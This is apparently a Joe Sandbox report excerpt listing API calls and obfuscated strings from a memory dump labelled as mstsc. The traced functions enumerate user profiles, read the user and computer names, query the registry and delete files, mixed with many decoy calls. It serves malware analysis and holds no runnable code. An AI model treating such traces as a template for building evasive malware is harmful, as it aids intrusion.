Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,000000BD), ref: 0006C30F
Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C312
Part of subcall function 0006C055: GetDesktopWindow.USER32 ref: 0006C32E
Part of subcall function 0006C055: RegOpenKeyW.ADVAPI32(80000002,00000000,?), ref: 0006C365
Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,00000051), ref: 0006C3E0
Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C3E7
Part of subcall function 0006C055: GetClipboardViewer.USER32 ref: 0006C403
Part of subcall function 0006C055: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0006C448
Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006C4A1
Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C4A8
Part of subcall function 0006C055: CountClipboardFormats.USER32 ref: 0006C4C0
Part of subcall function 0006C055: StrStrIW.SHLWAPI(?,00000000), ref: 0006C4F8
Part of subcall function 0006C055: Sleep.KERNEL32(00002710), ref: 0006C505
Part of subcall function 0006C055: StrStrIW.SHLWAPI(?,00000000), ref: 0006C514
Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C51C
Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C529
Part of subcall function 0006C055: RegCloseKey.ADVAPI32(?), ref: 0006C536
Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C540
Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C547
Part of subcall function 0006C055: Sleep.KERNELBASE(00002710), ref: 0006C56E
Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C59A
Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C59D
Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,?), ref: 0006C5A3
Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C5A6
Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,?), ref: 0006C5B2
Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C5B5

Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000000D,?,7142434B,00106D80), ref: 0006A9CF
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006A9D2
Part of subcall function 0006A98B: GetCapture.USER32 ref: 0006A9F3
Part of subcall function 0006A98B: GetModuleHandleA.KERNEL32(00000000), ref: 0006AA19
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006AA54
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AA57
Part of subcall function 0006A98B: GetOpenClipboardWindow.USER32 ref: 0006AA75
Part of subcall function 0006A98B: GetModuleHandleA.KERNEL32(00000000), ref: 0006AA9B
Part of subcall function 0006A98B: GetUserNameA.ADVAPI32(0007CDF0,?), ref: 0006AAC6
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006AAF9
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AAFC
Part of subcall function 0006A98B: GetClipboardViewer.USER32 ref: 0006AB16
Part of subcall function 0006A98B: lstrcmpA.KERNEL32(0007CDF0,00000000), ref: 0006AB41
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006AB78
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AB7B
Part of subcall function 0006A98B: GetFocus.USER32 ref: 0006AB95
Part of subcall function 0006A98B: lstrcmpA.KERNEL32(0007CDF0,00000000), ref: 0006ABC1
Part of subcall function 0006A98B: GetComputerNameA.KERNEL32(0007CDF0,00000400), ref: 0006ABE8
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006AC16
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AC19
Part of subcall function 0006A98B: GetCursor.USER32 ref: 0006AC30
Part of subcall function 0006A98B: lstrcmpA.KERNEL32(0007CDF0,00000000), ref: 0006AC5B
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006AC8D
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AC90
Part of subcall function 0006A98B: GetMenuCheckMarkDimensions.USER32 ref: 0006ACA7
Part of subcall function 0006A98B: lstrcmpA.KERNEL32(0007CDF0,00000000), ref: 0006ACD2
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006AD36
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AD39
Part of subcall function 0006A98B: GetMessageExtraInfo.USER32 ref: 0006AD53
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000013), ref: 0006ADB1
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006ADB4
Part of subcall function 0006A98B: GetClipboardOwner.USER32 ref: 0006ADCE
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006AE2F
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AE32
Part of subcall function 0006A98B: GetLastError.KERNEL32 ref: 0006AE4F
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000007), ref: 0006AE98
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AE9B
Part of subcall function 0006A98B: CountClipboardFormats.USER32 ref: 0006AEB8
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006AEFE
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AF01
Part of subcall function 0006A98B: GetFocus.USER32 ref: 0006AF1E
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006AF69
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AF6C
Part of subcall function 0006A98B: GetMessageExtraInfo.USER32 ref: 0006AF89
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006AFD4
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AFD7
Part of subcall function 0006A98B: GetForegroundWindow.USER32 ref: 0006AFF4
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000012), ref: 0006B052
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B055
Part of subcall function 0006A98B: GetProcessWindowStation.USER32 ref: 0006B072
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000008), ref: 0006B0BD
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B0C0
Part of subcall function 0006A98B: GetModuleHandleW.KERNEL32(00000000), ref: 0006B0DC
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006B125
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B128
Part of subcall function 0006A98B: GetCapture.USER32 ref: 0006B13F
Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B1CD
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000012), ref: 0006B213
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B216
Part of subcall function 0006A98B: IsSystemResumeAutomatic.KERNEL32 ref: 0006B22D
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0006B29D
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B2A0
Part of subcall function 0006A98B: GetCurrentThreadId.KERNEL32 ref: 0006B2B7
Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B2E2
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000002B), ref: 0006B363
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B366
Part of subcall function 0006A98B: GetClipboardSequenceNumber.USER32 ref: 0006B380
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006B40D
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B410
Part of subcall function 0006A98B: ReleaseCapture.USER32 ref: 0006B427
Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B452
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006B4B4
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B4B7
Part of subcall function 0006A98B: GetProcessWindowStation.USER32 ref: 0006B4CE
Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B4F9
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006B552
Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B555
Part of subcall function 0006A98B: GetMenuCheckMarkDimensions.USER32 ref: 0006B569
Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B594
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006B5AF
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5B8
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,00000005), ref: 0006B5BD
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5C0
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,706B7358), ref: 0006B5C7
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5CA
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B5D4
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5D7
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,39635538), ref: 0006B5DE
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5E1
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,7D0C1C30), ref: 0006B5E8
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5EB
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,48496F7A), ref: 0006B5F2
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5F5
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B5FF
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B602
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B60C
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B60F
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B619
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B61C
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B626
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B629
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B633
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B636
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B640
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B643
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B64D
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B650
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B657
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B65A
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B664
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B667
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,371D0123), ref: 0006B66E
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B671
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,4F1D1F21), ref: 0006B678
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B67B
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,63784E47), ref: 0006B682
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B685
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B68F
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B692
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,77584575), ref: 0006B699
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B69C
Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B6A6
Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B6A9

Strings

KCBqiNhR7x, xrefs: 000619C7

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00061C80, Relevance: 4.6, APIs: 3, Instructions: 60

APIs

LoadLibraryA.KERNEL32(?), ref: 00061CC1
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00061CE1
GetModuleHandleExA.KERNEL32(00000001,00000000,?), ref: 00061CF8

Part of subcall function 00061C18: GetProcAddress.KERNEL32(00000000,?,00060000,00000000,00000000,?,00061D0B,00000000,00000000,?), ref: 00061C65

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Non-executed Functions

Function 000622E6, Relevance: 140.4, APIs: 51, Strings: 29, Instructions: 448

APIs

GetProfilesDirectoryW.USERENV(00000000,?), ref: 0006230B
GetProcessHeap.KERNEL32(00000008,?), ref: 00062329
HeapAlloc.KERNEL32(00000000), ref: 0006232C
GetProcessHeap.KERNEL32(00000008,?), ref: 0006233F
HeapAlloc.KERNEL32(00000000), ref: 00062342
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006235A
HeapAlloc.KERNEL32(00000000), ref: 0006235D
GetProfilesDirectoryW.USERENV(?,?), ref: 000623A2
GetProcessHeap.KERNEL32(00000008,00000015), ref: 000623E7
HeapAlloc.KERNEL32(00000000), ref: 000623EA
GetOpenClipboardWindow.USER32 ref: 0006240A
FindFirstFileW.KERNEL32(?,?), ref: 00062470
GetProcessHeap.KERNEL32(00000008,00000009), ref: 000624BE
HeapAlloc.KERNEL32(00000000), ref: 000624C1
GetCommandLineA.KERNEL32 ref: 000624DD
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006250C
HeapAlloc.KERNEL32(00000000), ref: 0006250F
GetForegroundWindow.USER32 ref: 0006252B
lstrcmpW.KERNEL32(?,?), ref: 00062560
lstrcmpW.KERNEL32(?,00000000), ref: 0006257C
GetProcessHeap.KERNEL32(00000008,00000051), ref: 000625F4
HeapAlloc.KERNEL32(00000000), ref: 000625F7
GetCurrentProcessId.KERNEL32 ref: 00062610
GetProcessHeap.KERNEL32(00000008,0000004D), ref: 000626C7
HeapAlloc.KERNEL32(00000000), ref: 000626CA
GetCurrentProcessId.KERNEL32 ref: 000626E9
GetProcessHeap.KERNEL32(00000008,00000061), ref: 00062788
HeapAlloc.KERNEL32(00000000), ref: 0006278B
GetMenuCheckMarkDimensions.USER32 ref: 000627A4
wsprintfW.USER32 ref: 000627E3
GetFileAttributesW.KERNEL32(?), ref: 000627ED

Part of subcall function 0006E0AE: DeleteFileW.KERNEL32(?,?,00000000,76E6FE8D,00062806), ref: 0006E0C2
Part of subcall function 0006E0AE: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E0DC
Part of subcall function 0006E0AE: HeapFree.KERNEL32(00000000), ref: 0006E0E3

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00062814
HeapFree.KERNEL32(00000000), ref: 0006281D
GetProcessHeap.KERNEL32(00000000,?), ref: 00062839
HeapFree.KERNEL32(00000000), ref: 0006283C
GetProcessHeap.KERNEL32(00000000,?), ref: 00062844
HeapFree.KERNEL32(00000000), ref: 00062847
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00062859
HeapFree.KERNEL32(00000000), ref: 0006285C
GetProcessHeap.KERNEL32(00000000,?), ref: 00062866
HeapFree.KERNEL32(00000000), ref: 00062869
FindNextFileW.KERNEL32(?,?), ref: 00062879
FindClose.KERNEL32(00000000), ref: 0006288B
GetProcessHeap.KERNEL32(00000000,?), ref: 0006289A
HeapFree.KERNEL32(00000000), ref: 0006289D
GetProcessHeap.KERNEL32(00000000,?), ref: 000628B1
HeapFree.KERNEL32(00000000), ref: 000628B4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000628C2
HeapFree.KERNEL32(00000000), ref: 000628C5
GetProcessHeap.KERNEL32(00000000,?), ref: 000628D6
HeapFree.KERNEL32(00000000), ref: 000628D9

Strings

gebG, xrefs: 00062482
sb0aVS, xrefs: 00062420
bQ+K, xrefs: 00062734
-KQG, xrefs: 0006276C
K, xrefs: 000626AD
eGtX, xrefs: 0006273B
AKUKD31SL1iwXziJXfvzGJXfIebGvy, xrefs: 000626FF
.9 Q, xrefs: 00062765
IGQX, xrefs: 00062781
vzGJXfIebGvy, xrefs: 00062521
0a, xrefs: 000623D4
X>9, xrefs: 00062750
3A, xrefs: 000626A4
xSYb, xrefs: 000623CD
}KJG, xrefs: 00062749
ZG:X, xrefs: 0006275E
3Q5K, xrefs: 0006277A
1SL1iwXziJXfvzGJXfIebGvy, xrefs: 00062626
3-K, xrefs: 00062686
K6K%, xrefs: 0006267C
3 K, xrefs: 00062668
XziJXfvzGJXfIebGvy, xrefs: 00062541
IebGvy, xrefs: 000624F3
}S#1, xrefs: 0006259B
K8K4, xrefs: 0006269A
=Xe9, xrefs: 00062773
6Q2K, xrefs: 00062757
43, xrefs: 0006264F
K4K0, xrefs: 0006265E

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00061E16, Relevance: 115.8, APIs: 48, Strings: 18, Instructions: 350

APIs

GetProcessHeap.KERNEL32(00000008,00000208), ref: 00061E30
HeapAlloc.KERNEL32(00000000), ref: 00061E39
GetProcessHeap.KERNEL32(00000008,00000208), ref: 00061E41
HeapAlloc.KERNEL32(00000000), ref: 00061E44
GetProcessHeap.KERNEL32(00000008,00000208), ref: 00061E4C
HeapAlloc.KERNEL32(00000000), ref: 00061E4F
GetProcessHeap.KERNEL32(00000008,00000051), ref: 00061EB2
HeapAlloc.KERNEL32(00000000), ref: 00061EB5
GetCurrentProcessId.KERNEL32 ref: 00061ECC
GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00061F59
HeapAlloc.KERNEL32(00000000), ref: 00061F5C
GetCurrentProcessId.KERNEL32 ref: 00061F73
GetProfilesDirectoryW.USERENV(?,00000104), ref: 00061FA9
wsprintfW.USER32 ref: 00061FC6
FindFirstFileW.KERNEL32(?,?), ref: 00061FD9
StrCmpW.SHLWAPI(?,000704E4), ref: 00061FF9
StrCmpW.SHLWAPI(?,000704E8), ref: 00062013
StrCpyW.SHLWAPI(?,?), ref: 0006204E
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00062058
HeapAlloc.KERNEL32(00000000), ref: 0006205B
GetProcessWindowStation.USER32 ref: 00062072
StrCatW.SHLWAPI(?,00000000), ref: 0006209D
GetProcessHeap.KERNEL32(00000008,00000025), ref: 000620D8
HeapAlloc.KERNEL32(00000000), ref: 000620DB
GetDoubleClickTime.USER32 ref: 000620EF
wsprintfW.USER32 ref: 0006212A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00062145
HeapFree.KERNEL32(00000000), ref: 0006214E
GetProcessHeap.KERNEL32(00000000,?), ref: 00062156
HeapFree.KERNEL32(00000000), ref: 00062159
FindNextFileW.KERNEL32(00000000,?), ref: 00062179
FindClose.KERNEL32(00000000), ref: 00062184
GetProcessHeap.KERNEL32(00000008,00000049), ref: 000621F2
HeapAlloc.KERNEL32(00000000), ref: 000621F5
GetDialogBaseUnits.USER32 ref: 00062209
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00062238

Part of subcall function 0006DDBF: lstrlenW.KERNEL32(?,00000001,00000000,?), ref: 0006DDE5
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006DDFA
Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DDFD
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,?), ref: 0006DE20
Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DE23
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000250), ref: 0006DE3A
Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DE3D
Part of subcall function 0006DDBF: lstrcpyW.KERNEL32(?,00000001), ref: 0006DE55
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006DE70
Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DE73
Part of subcall function 0006DDBF: GetProcessWindowStation.USER32 ref: 0006DE87
Part of subcall function 0006DDBF: lstrcatW.KERNEL32(?,00000000), ref: 0006DEB8
Part of subcall function 0006DDBF: lstrcpyW.KERNEL32(00062247,00000001), ref: 0006DEC4
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006DEF5
Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DEF8
Part of subcall function 0006DDBF: GetOpenClipboardWindow.USER32 ref: 0006DF0C
Part of subcall function 0006DDBF: lstrcatW.KERNEL32(00062247,00000000), ref: 0006DF3D
Part of subcall function 0006DDBF: FindFirstFileW.KERNEL32(00062247,?), ref: 0006DF47
Part of subcall function 0006DDBF: lstrlenW.KERNEL32(79146553), ref: 0006DF7F
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,314C5341), ref: 0006DF9A
Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006DF9D
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0006DFAC
Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DFAF
Part of subcall function 0006DDBF: lstrcpyW.KERNEL32(00000000,313F5356), ref: 0006DFCA
Part of subcall function 0006DDBF: lstrcatW.KERNEL32(314C5341,?), ref: 0006DFD4
Part of subcall function 0006DDBF: lstrcatW.KERNEL32(314C5341,79146553), ref: 0006DFED
Part of subcall function 0006DDBF: RemoveDirectoryW.KERNEL32(314C5341), ref: 0006E014
Part of subcall function 0006DDBF: DeleteFileW.KERNEL32(314C5341), ref: 0006E01F
Part of subcall function 0006DDBF: FindNextFileW.KERNEL32(sb0aVS,?), ref: 0006E035
Part of subcall function 0006DDBF: GetLastError.KERNEL32 ref: 0006E051
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E05D
Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E066
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E06B
Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E06E
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,77043129), ref: 0006E075
Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E078
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,00062247), ref: 0006E082
Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E085
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E091
Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E094
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E0A0
Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E0A3

GetProcessHeap.KERNEL32(00000000,?), ref: 00062253
HeapFree.KERNEL32(00000000), ref: 0006225C
GetProcessHeap.KERNEL32(00000000,?), ref: 00062263
HeapFree.KERNEL32(00000000), ref: 00062266
GetProcessHeap.KERNEL32(00000000,?), ref: 0006226D
HeapFree.KERNEL32(00000000), ref: 00062270
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00062275
HeapFree.KERNEL32(00000000), ref: 00062278
GetProcessHeap.KERNEL32(00000000,?), ref: 00062280
HeapFree.KERNEL32(00000000), ref: 00062283
GetProcessHeap.KERNEL32(00000000,?), ref: 0006228E
HeapFree.KERNEL32(00000000), ref: 00062291

Strings

wPS, xrefs: 00061E66
Fvnw, xrefs: 000620BE
e3yW, xrefs: 000621C5
}S#1, xrefs: 00061E5F
bS)1, xrefs: 00061E74
K4K0, xrefs: 00061F11
43, xrefs: 00061F05
e7yr, xrefs: 000621DA
>IGn, xrefs: 00062025
I, xrefs: 000621E1
ph, xrefs: 0006202C
%s\*, xrefs: 00061FBE
K8K4, xrefs: 00061F3B
*2R0, xrefs: 000620B7
K6K%, xrefs: 00061F26
3 K, xrefs: 00061F18
bImnph2w05v, xrefs: 00062088
AKUKD3, xrefs: 00061EE2

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006A0EE, Relevance: 94.8, APIs: 36, Strings: 18, Instructions: 289

APIs

GetProcessHeap.KERNEL32(00000008,00000069,?,00000000,76E6FE8D), ref: 0006A1A4
HeapAlloc.KERNEL32(00000000), ref: 0006A1A7
ReleaseCapture.USER32 ref: 0006A1C2
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0006A1F5
GetShortPathNameW.KERNEL32(?,?,00000104), ref: 0006A206
GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0006A258
HeapAlloc.KERNEL32(00000000), ref: 0006A25B
GetForegroundWindow.USER32 ref: 0006A272
wsprintfW.USER32 ref: 0006A2A6
GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006A2E6
HeapAlloc.KERNEL32(00000000), ref: 0006A2E9
RevertToSelf.ADVAPI32 ref: 0006A300
CoInitializeEx.OLE32(00000000,00000006), ref: 0006A362
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006A392
HeapAlloc.KERNEL32(00000000), ref: 0006A395
GetCapture.USER32 ref: 0006A3AC
GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006A40B
HeapAlloc.KERNEL32(00000000), ref: 0006A40E
GetDoubleClickTime.USER32 ref: 0006A422
LoadLibraryA.KERNEL32(57495761), ref: 0006A44C
GetProcAddress.KERNEL32(00000000), ref: 0006A453
GetLastError.KERNEL32 ref: 0006A45D
Sleep.KERNEL32(00000064), ref: 0006A46C
GetForegroundWindow.USER32 ref: 0006A472
CoUninitialize.OLE32 ref: 0006A48B
CloseHandle.KERNEL32(?), ref: 0006A494
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A4A3
HeapFree.KERNEL32(00000000), ref: 0006A4AC
GetProcessHeap.KERNEL32(00000000,57495761), ref: 0006A4B2
HeapFree.KERNEL32(00000000), ref: 0006A4B5
GetProcessHeap.KERNEL32(00000000,4E5A666B), ref: 0006A4BB
HeapFree.KERNEL32(00000000), ref: 0006A4BE
GetProcessHeap.KERNEL32(00000000,31653832), ref: 0006A4C4
HeapFree.KERNEL32(00000000), ref: 0006A4C7
GetProcessHeap.KERNEL32(00000000,?), ref: 0006A4CD
HeapFree.KERNEL32(00000000), ref: 0006A4D0

Strings

I, xrefs: 0006A407
*kFZ, xrefs: 0006A21D
28e1s, xrefs: 0006A1D8
qb3B, xrefs: 0006A400
kfZNI, xrefs: 0006A288
y{[W, xrefs: 0006A379
Us[8, xrefs: 0006A132
.N(k, xrefs: 0006A22B
V8K1, xrefs: 0006A184
KfuN, xrefs: 0006A216
deBs, xrefs: 0006A14A
aWIWz, xrefs: 0006A316
<, xrefs: 0006A32B
@, xrefs: 0006A358
Y$i, xrefs: 0006A380
q, xrefs: 0006A3FC
"V., xrefs: 0006A3DE
!<, xrefs: 0006A3EC

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006DDBF, Relevance: 80.8, APIs: 42, Strings: 4, Instructions: 256

APIs

Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
Part of subcall function 0006D97F: HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
